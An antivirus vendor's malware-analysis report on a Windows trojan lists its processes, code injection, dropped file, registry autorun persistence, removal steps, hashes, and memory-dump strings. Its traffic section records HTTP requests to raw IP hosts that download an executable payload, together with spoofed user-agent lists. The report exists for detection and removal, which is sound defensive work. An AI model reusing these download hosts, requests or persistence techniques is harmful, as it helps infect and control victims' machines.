Gen.Variant.Zusy.205305_c63f82eb22 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:704
%original file name%.exe:716
temp1613017254.exe:408

The Trojan injects its code into the following process(es):

temp1613017254.exe:1076

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:704 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\temp1613017254.exe (5442 bytes)

The process temp1613017254.exe:1076 makes changes in the file system.

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp.exe (0 bytes)

Registry activity

The process %original file name%.exe:704 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 4C 65 4F 37 1D BB 77 6F CB 8F 5F 09 F8 69 4C"

The process %original file name%.exe:716 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 C9 89 ED 3A CE 1F 41 B1 29 76 B6 7D E1 54 CA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process temp1613017254.exe:1076 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 94 01 65 8D D8 FB C3 EE 17 6A F1 5A 19 F0 C5"

[HKCU\Software\Microsoft\Notepad]
"SizeCompletedValid" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="

[HKCU\Software\Sysinternals\Process Monitor]
"UrlEnabledUse" = "80"

[HKLM\System\CurrentControlSet\Services\nm\Parameters]
"EnableStationQueries" = "1"
"ComputerName" = "XP7"

[HKCU\Software\Microsoft\Notepad]
"InfoPlayedCurrent" = "00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"DBSavedUse" = "A2 49 4D F3 D9 1E 9F 88 01 01 08 6A 00 03 98 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Sysinternals\Process Monitor]
"FlagsModifiedValid" = "00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Notepad]
"StyleModifiedPrev" = "80"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"PlatformCompressedValid" = "00 00 00 00 00 00 00 00"
"PersistentLocalizedName" = "CB 80 F9 7F 7A 92 E2 AE 4A E9 9E 3D 21 85 B5 92"

[HKCU\Software\Sysinternals\Process Monitor]
"DefaultCompressedRecord" = "CB 80 F9 7F 73 B0 96 97 A5 6D BA E1 E2 08 86 E7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Notepad]
"ActiveModifiedTheme" = "CB 80 F9 7F 87 E1 B4 EE C3 B9 D7 46 28 5C D8 5E"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"RecordEnabledCheck" = "80"

[HKCU\Software\Sysinternals\Process Monitor]
"RecordModifiedMax" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="

[HKLM\System\CurrentControlSet\Services\nm\Parameters]
"UserName" = "%CurrentUserName%"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"LineLoadedQuick" = "DAqs6LMSkogN294CNi9SS2pnNSTJn3PzmP v9UYGf/4AICblETLQS1T96Ci4DQj4eQ=="

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetworkChecker" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe"

The process temp1613017254.exe:408 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

Dropped PE files

MD5	File path
3353a9c88fcd77ed1bebae124b65beb4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\temp1613017254.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:704
%original file name%.exe:716
temp1613017254.exe:408
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\temp1613017254.exe (5442 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetworkChecker" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\temp1613017254.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	31702	32768	3.90163	34cba9b044ea2361fe8decdb4dd2f4f9
.rda	36864	3049	4096	2.00959	e34b57e2f529a2291a1dcefc4113a147
.data	40960	577	4096	0.418623	53a6ec818c2bad848cb617cb887f0d7e
.ida	45056	3047	4096	3.03522	aca78db13f3eda332808891c936edbb6
.rsrc	49152	2272	4096	1.30331	fc83d57640df09d44455480ea91c8d29
.reloc	53248	1853	4096	2.21907	915194c4e62a60b03de6669744081d07

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 19
f238a12e3ef0310c61f24f5a5e245208
f6a6b221f41fc8283a810a5e8e9a66e5
99564cb5dedc1d51ebcfa470d6723cc8
23428d92527c8e919baa63597bec1c75
824de34d33cb78b1e3b0e26b3d48f5d0
da4b169e389a845046ddac26b3b73f35
7702db5880df216b0cc3f724cd49c9b4
354bde16801b6ded8ca4bce3da0f1dbe
949531905417445acff9757cc331d2fb
8146a109171433a12f297233fac87d4c
4c6477776f1df4b6d6fcf2755dd9f638
265f9c827098ef01026b4dae9762a4d8
e190833272f1403b5caeb1d05c39838e
db17f4845e35e685d86cb7e35a5d1d01
c07b1245ea7a25860476d237810b0925
28bb1befcf537a8c2aedd0ab7bb94b61
3b16b2a04caef1ff2e1399a0cd92e000
b3cf9d60876ba42586710a8043cfb74c
3616f6837505f09a1b60ab9d013e3bdb

Network Activity

URLs

URL	IP
hxxp://193.28.179.40/omydarl.exe
hxxp://95.104.39.96/online.htm
hxxp://95.104.39.96/setup.htm

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /omydarl.exe HTTP/1.0

Host: 193.28.179.40

HTTP/1.1 200 OK

Server: nginx/1.2.6

Date: Wed, 21 Sep 2016 19:35:04 GMT

Content-Type: application/octet-stream

Content-Length: 1088759

Connection: close

Last-Modified: Wed, 21 Sep 2016 19:21:09 GMT

ETag: "57e2dda5-109cf7"

Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z.V............|'...;...$...;...$...;.......;.......;...;..C;...$...;...$...;..8=...;..Rich.;..........PE..L....,.W.....................P......f............. ..................................................................................................................................................................................................text....{.......................... ..`.rdata..............................@..@.data...A...........................@....idata..............................@....rsrc...............................@..@.reloc..=...........................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

...0lUUE..H@..B@...n........0F.A...F.9Z7..v%......D\W}..)i..6..(.m..D.>...d..\.......2.vY..j...e_...\=.....`M......b...b..4.../@....$./w....j]lV.a.......!....c.....

}..0.UUE.@....5x...1...Y.#@.cTW..A.....1u.m4....sE.hd...... ....XE."*......b....F....d.p..~3.M.a. ..../=Wh!..'..k.BH0..rf.E...p#.>...H....>..~......q.. !......_^...|..U..uv....0}.........D1@.....yCI..h)...w.}.@A.....<..}...Q...O3.".;..v.

..

GET /online.htm HTTP/1.1

Host: 95.104.39.96

Content-Length: 164

User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25

.. DlUUE..H@.TC..Nr.O2&.|.qE0F.A..!...^..#].....D.mi.7.?j.".......3......&O. q....hU..L....[C.H-.....i1.>.*...Z.!.HdK...[...4U..C..N.t...%}1..r..I...t.f.y..}...>F.

HTTP/1.1 200

Server: Apache

Content-Length: 229

Content-Type:

Last-Modified: .., 21 ... 2016 19:35:28 GMT

Accept-Ranges: bytes

Server:nginx/1.2.6

Date:Wed, 21 Sep 2016 19:35:33 GMT

Last-Modified:Wed, 21 Sep 2016 19:35:33 GMT

Accept-Ranges:bytes

GET /setup.htm HTTP/1.1

Host: 95.104.39.96

Content-Length: 1912

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)

.O...ts...s.s.s.v.s......K..........V..rn...1.E....!.....1..L'..n....F......{.8...j..F...C.G{. 1......a........t...&....,...*5.}........V..........;Q..y...`i.....'..(%c..`r}.......1...EH..Uo.'d...C...z.%1.h..v.C...#....'........V.....Q...;&(........)r....,a.j..bU....6.~/....k..Z\#.nJ...c.'Zk...A......<..a........Lx...b[..l.....R.....>......kH K>.c.;.$..G.....z@j.l......q.5.<j.[3w..C..}.N....}d...:me...._]b..

..../)...QZ...;cs.

P.....q.i..v..,..d.s)70.....;h.....}RF...P8..#_..tVt;nL(....w......5.q..~.....Z (..|..&...Dll..3.~.....\..P"Xqt.d..}<3...s..J..=e.1....)Th...*.$...<.Z..?H..>B......j..iudo:..q%.......I.-Q..S&V.^d.`........D..=~..L$;X..u@I.b...Z....X.e... .$>..?..1a.G...A.4...{.>h..DJ.0.V...(....t>.]z:#..\nB.".Y_...r=...Xjl3*%m@[.........?$d.H..=.....q.}...@.L.....

m..a..J.Z..{.%..a.U]P..a.u>........jv.]6.Nk.q._...#E.....x...(J7...5/.I;MI..`Q.5...54m'}..ARE..p.e.... DT.....=.u ..%._.<.}o..f|. A...v.....w.\..g~c.m;@....(-A|.'.=..e.ZG......5f.C7.{...B..u...".G.g..G.-....h.....@z.....6.a......p....P...W<..>?I...3E

...!.!sX(....K.m.o.........;&U[#...d.g.w.....d8.*.@1.j.'.S..-._..=....xcO<.....$..;.W...)6...".F%.

...,....j...z...

*.#.K$(wS.........L...,..!.q.?sT...$.@..3.c..>2.M......w7D..f.........5.%"..=L..o~*X...-rh.Yx....yw..d..b....lM`m.....Np.;.

HTTP/1.1 200

Server: Apache

Content-Length: 34895

Content-Type:

Last-Modified: .., 21 ... 2016 19:35:29 GMT

Accept-Ranges: bytes

Server:nginx/1.2.6

Date:Wed, 21 Sep 2016 19:35:34 GMT

Last-Modified:Wed, 21 Sep 2016 19:35:34 GMT

Accept-Ranges:bytes

$.4."Y.....P.H.......)&.V...<H.Tz.XT.L*~v...1..L'..n....Fh2....6rb4.Qkm.&..T..|._....b".\...._}...;u.7.N..B....(.V....._:.F.W.S}.n....#d5i:....G.H.} .RM4C.3. ....Z:......Q.......*...u...=..X~..kG...\....)o...^!U.NN.?...Y...p..... A....}..z..,.?.;".N<.P......#...E..(|.Q..P...pH.O.|.MC5.....~.:'.t..H.e.e...:....\.O....J.V:..9@..w...<e...N.z...p.a..*.1.M.....=..M....f..Z...#.r..q._X.C....[..8."....:.. R.._...... ./..........J..bM.r...$2?6E..p.v.%.N.!.|-.....e..6.H...~.H?"Wn.c.'6..s..... .x-R7xT.A...."V...g....`..zmC.....".W..s..%..........Q........$qB..L. o....b..K...O.S.n]]s ...#...d.c[...9...;o.....D.".. .4.c6-E..(.aM.i.Nwmz.]..bs@'&{.......#]...?...@..C.......dAu..f.<Q.......:..~.<.V9..l......!&...&.B..u.|....2...g.Zpo.'........e.&...y5......w{.F...,A....o...[Q.h.]SDU.O^.....`Z..... 9s..X...G..6..s,.q.........h.c.....c.......TJ.$."ty.k.-E.x.j..tU...o...o...I.......&.dZ.E.PdD......m`..D ..#........h..C..X....H..~..o.u..F(............!....e....u......Z.YWu;.a.C..Ez.Ax........#......A.vt*xr#...4..5..m.....}Gb5...1........L.C..P(...!u..W}>.:42...&..c........).M..... .".a%.1...-..6..20E...SZ..W....2....V....f......uq.w*.....WS..9..f..,b...=N2.aL-..}......IK.v..W...F..<..)....3......g'....%.XA.........E.<.4.....)|...p...xpbs.Q......p./.....4..$X..O.....h...)0.q......3k.sG..~(@d.n.9....Np.L..B.s."9..h``.....GT....p..|C...F..h...x....... 2.wx...?.t6p..z.c...L.`....'l.`........i(.A..r.T&Dk}...<..?.b...W..Tx8........u,.....O....y.a...8.......d8H.677....}.w....t.z.^..,..E....../....W..:.D......

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

temp1613017254.exe_1076:

FTPQ

PSSSSSSh

FTPS

~$)~()|$

3|$83|$0

3|$

3|$@3|$4

.QZ^&

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag

Can't terminate a sub-expression with an alternation operator |.

A regular expression can start with the alternation operator |.

Alternation operators are not allowed inside a DEFINE block.

More than one alternation operator | was encountered inside a conditional expression.

A repetition operator cannot be applied to a zero-width assertion.

Invalid alternation operators within (?...) block.

The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.

Found a closing repetition operator } with no corresponding {.

The repeat operator " " cannot start a regular expression.

The repeat operator "?" cannot start a regular expression.

The repeat operator "*" cannot start a regular expression.

right-curly-bracket

left-curly-bracket

0123456789

Unmatched quantified repeat operator { or \{.

Invalid preceding regular expression prior to repetition operator.

1.2.5

boost::filesystem::directory_iterator::operator

Visual C CRT: Not enough memory to complete call to strerror.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

USER32.DLL

login

Mozilla/5.0 (Windows NT 5.1) Gecko/20100101 Firefox/14.0 Opera/12.0

Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00

Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14

Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14

Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; da-dk) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1

Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2

Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)

Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0

Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0

Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0

Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0

Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130401 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130328 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130330 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130401 Firefox/21.0

Mozilla/5.0 (Windows NT 6.2; rv:21.0) Gecko/20130326 Firefox/21.0

Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0

Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0

Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0

Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20130405 Firefox/22.0

Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0

Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36

Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36

Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)

asio.misc

asio.misc error

thread.entry_event

thread.exit_event

255.255.255.255

0.0.0.0

127.0.0.1

%d.%m.%Y %H:%M:%S

%a, %d %b %Y %H:%M:%S GMT

(3-!0,1'8"5.*2$

.text

h.rdata

H.data

.rsrc

B.reloc

DriverEntry: TCP-IP not found, quitting.

DriverEntry: Adapters not found in the registry, try to copy the bindings of TCP-IP.

DriverEntry: OS Version: %d.%d

Device %d = %ws

Status of %x querying key value

Status of %x querying key value for size

OpenKey Failed, %d!

Key name=%ws

Status of %x opening %ws

Mac %u = %ws

Tcpip bind value not REG_MULTI_SZ but %u

Querying key value result len = %u but previous len = %u

IoCreateDevice status = %x

NPF_IoControl: BIOCQUERYOID completed, BytesWritten = %u

NPF_IoControl: Bogus return from NdisRequest (query): Bytes Written (%u) > InfoBufferLength (%u)!!

NPF_IoControl: BIOCSETOID completed, BytesRead = %u

NPF_IoControl: Error installing the BPF filter. The filter contains TME extensions, not supported on 64bit platforms.

NPF_IoControl: Operative instructions=%u

KeGetCurrentIrql() == PASSIVE_LEVEL

e:\releases\winpcap_4_1_0_1753\winpcap\packetntx\driver\openclos.c

NPF_Open: Opened Instances: %u

NPF_Open: Opened the device, Status=%x

NPF_Cleanup: Opened Instances: %u

Received on CPU %d

HeaderBufferSize=%u, LookAheadBuffer=%p, LookaheadBufferSize=%u, PacketSize=%u

NPF_Write: Max frame size = %u, packet size = %u

NPF_Write: Another Send operation is in progress, aborting.

NPF: BufferedWrite, UserBuff=%p, Size=%u

e:\releases\winpcap_4_1_0_1753\winpcap\packetntx\driver\bin\i386\npf.pdb

ZwQueryValueKey

ZwEnumerateKey

ZwOpenKey

ntoskrnl.exe

HAL.dll

NDIS.SYS

0$0)02090

hXXp://ocsp.verisign.com0

"hXXp://crl.verisign.com/tss-ca.crl0

Thawte Certification1

0hXXp://crl.verisign.com/ThawteTimestampingCA.crl0

.Class 3 Public Primary Certification Authority0

2Terms of use at hXXps://VVV.verisign.com/rpa (c)041.0,

hXXps://VVV.verisign.com/rpa01

hXXp://crl.verisign.com/pca3.crl0

.Class 3 Public Primary Certification Authority

/hXXp://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D

hXXps://VVV.verisign.com/rpa0

hXXp://ocsp.verisign.com0?

3hXXp://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

n.aAHu

`.rdata

@.data

@.reloc

L$.Qf

mscoree.dll

.mixcrt

KERNEL32.DLL

kernel32.dll

@(#) $Header: /tcpdump/master/libpcap/scanner.l,v 1.110.2.2 2008/02/06 10:21:47 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/savefile.c,v 1.168.2.10 2008-10-06 15:38:39 gianluca Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/pcap.c,v 1.112.2.12 2008-09-22 20:16:01 guy Exp $ (LBL)

4.1.1

WinPcap version %s, based on %s

WinPcap version %s (packet.dll version %s), based on %s

@(#) $Header: /tcpdump/master/libpcap/pcap-win32.c,v 1.34.2.8 2008-05-21 22:11:26 gianluca Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/optimize.c,v 1.90.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/nametoaddr.c,v 1.82.2.1 2008/02/06 10:21:47 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/inet.c,v 1.75.2.4 2008-04-20 18:19:24 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/grammar.y,v 1.99.2.2 2007/11/18 02:04:55 guy Exp $ (LBL)

$$$88$$$8

"#-./0123

@(#) $Header: /tcpdump/master/libpcap/gencode.c,v 1.290.2.16 2008-09-22 20:16:01 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/fad-win32.c,v 1.15 2007/09/25 20:34:36 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/etherent.c,v 1.23 2006/10/04 18:09:22 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/bpf_image.c,v 1.27.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/bpf/net/bpf_filter.c,v 1.45.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)

@(#) $Header: /tcpdump/master/libpcap/bpf_dump.c,v 1.14.4.1 2008/01/02 04:22:16 guy Exp $ (LBL)

%u %u %u %u

{ 0x%x, %d, %d, 0xx },

[x %d]

#0x%x

4*([%d]&0xf)

M[%d]

(d) %-8s %-16s jt %d

jf %d

(d) %-8s %s

malloc: %s

PacketGetAdapterNames: %s

pcap_compile cannot generate filters for a TurboCap port when the PPI linktype is used.

unknown data link type %d

unsupported protocol over mpls

IEEE 802.15.4 link-layer type filtering not implemented

'tcp' modifier applied to %s

'sctp' modifier applied to %s

'udp' modifier applied to %s

'icmp' modifier applied to %s

'igmp' modifier applied to %s

'igrp' modifier applied to %s

'pim' modifier applied to %s

'vrrp' modifier applied to %s

'icmp6' modifier applied to %s

'ah' modifier applied to %s

'esp' modifier applied to %s

'esis' modifier applied to %s

'isis' modifier applied to %s

'clnp' modifier applied to %s

'stp' modifier applied to %s

'netbeui' modifier applied to %s

'radio' modifier applied to %s

'ip' modifier applied to ip6 %s

'rarp' modifier applied to ip6 %s

'arp' modifier applied to ip6 %s

'decnet' modifier applied to ip6 %s

unknown ip proto '%s'

unknown ether proto '%s'

unknown osi proto '%s'

'protochain' not supported with 802.11

unsupported proto to gen_protochain

'udp proto' is bogus

'tcp proto' is bogus

unknown network '%s'

unknown ether host '%s'

unknown FDDI host '%s'

unknown token ring host '%s'

unknown 802.11 host '%s'

unknown Fibre Channel host '%s'

only ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel supports link-level host name

unknown host '%s'

unknown host '%s'%s

illegal qualifier of 'port'

unknown port '%s'

port '%s' is tcp

port '%s' is sctp

port '%s' is udp

illegal qualifier of 'portrange'

unknown port in range '%s'

port in range '%s' is tcp

port in range '%s' is sctp

port in range '%s' is udp

'gateway' not supported in this configuration

unknown protocol: %s

non-network bits set in "%s mask %s"

non-network bits set in "%s/%d"

invalid ip6 address %s

%s resolved to multiple address

mask length must be

ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel

unsupported index operation

IPv6 upper-layer protocol is not supported by proto[x]

only link-layer/IP broadcast filters supported

link-layer multicast filters supported only on ethernet/FDDI/token ring/ARCNET/802.11/ATM LANE/Fibre Channel

inbound/outbound not supported on linktype %d

libpcap was compiled without pf support

libpcap was compiled on a machine without pf support

802.11 link-layer types supported only on 802.11

frame direction supported only with 802.11 headers

aid supported only on ARCnet

no VLAN support for data link type %d

no MPLS support for data link type %d

'vpi' supported only on raw ATM

'vci' supported only on raw ATM

'callref' supported only on raw ATM

'metac' supported only on raw ATM

'bcc' supported only on raw ATM

'oam4sc' supported only on raw ATM

'oam4ec' supported only on raw ATM

'sc' supported only on raw ATM

'ilmic' supported only on raw ATM

'lane' supported only on raw ATM

'llc' supported only on raw ATM

'fisu' supported only on MTP2

'lssu' supported only on MTP2

'msu' supported only on MTP2

'sio' supported only on SS7

sio value %u too big; max value = 255

'opc' supported only on SS7

opc value %u too big; max value = 16383

'dpc' supported only on SS7

dpc value %u too big; max value = 16383

'sls' supported only on SS7

sls value %u too big; max value = 15

'oam' supported only on raw ATM

'oamf4' supported only on raw ATM

'connectmsg' supported only on raw ATM

'metaconnect' supported only on raw ATM

'port' modifier applied to ip host

'portrange' modifier applied to ip host

%d-%d

%d.%d

malformed decnet address '%s'

decnet name support not included, '%s' cannot be translated

%s for block-local relative jump: off=%d

malloc() failed: %s

%s '%s' %s

Error when listing files: does folder '%s' exist?

%s '%s' %s %s

[%[1234567890:.]]:%[^/]/%s

[%[1234567890:.]]/%s

%[^/:]:%[^/]/%s

%[^/]/%s

Source type not supported

getaddrinfo() %s

(%s) and not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)

not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)

TcApi.dll

TcQueryPortList

TcFreePortList

TcPortGetName

TcPortGetDescription

TcPacketsBufferCreate

TcPacketsBufferDestroy

TcPacketsBufferQueryNextPacket

TcPacketsBufferCommitNextPacket

Error opening TurboCap adapter: %s

Error enabling reception on a TurboCap instance: %s

Error setting the read timeout a TurboCap instance: %s

Getting the non blocking status is not available for TurboCap ports

Setting the non blocking status is not available for TurboCap ports

send error: the TurboCap API does not support packets larger than 64k

send error: TcPacketsBufferCreate failure: %s (x)

send error: TcInstanceTransmitPackets failure: %s (x)

send error: TcPacketsBufferCommitNextPacket failure: %s (x)

read error, TcInstanceReceivePackets failure: %s (x)

read error, TcPacketsBufferQueryNextPacket failure: %s (x)

TurboCap error setting the mintocopy: %s (x)

Mode %u not supported by TurboCap devices. TurboCap only supports capture.

TurboCap error in TcInstanceQueryStatistics: %s (x)

TurboCap error in TcStatisticsQueryValue: %s (x)

setfilter, unable to install the filter: %s

PacketGetStats error: %s

Error opening adapter: %s

Cannot determine the network type: %s

Error calling PacketSetMinToCopy: %s

Driver error: cannot set bpf filter: %s

PacketSetReadTimeout: %s

IEEE 802.15.4 with non-ASK PHY data

Bluetooth HCI UART transport layer plus pseudo-header

IEEE 802.15.4

IEEE 802.15.4 with Linux padding

Bluetooth HCI UART transport layer

Juniper Passive Monitor PIC

can't perform operation on activated capture

%s: %s

%s is not one of the DLTs supported by this device

DLT %d is not one of the DLTs supported by this device

That device doesn't support promiscuous mode

That device doesn't support monitor mode

That operation is supported only in monitor mode

Unknown error: %d

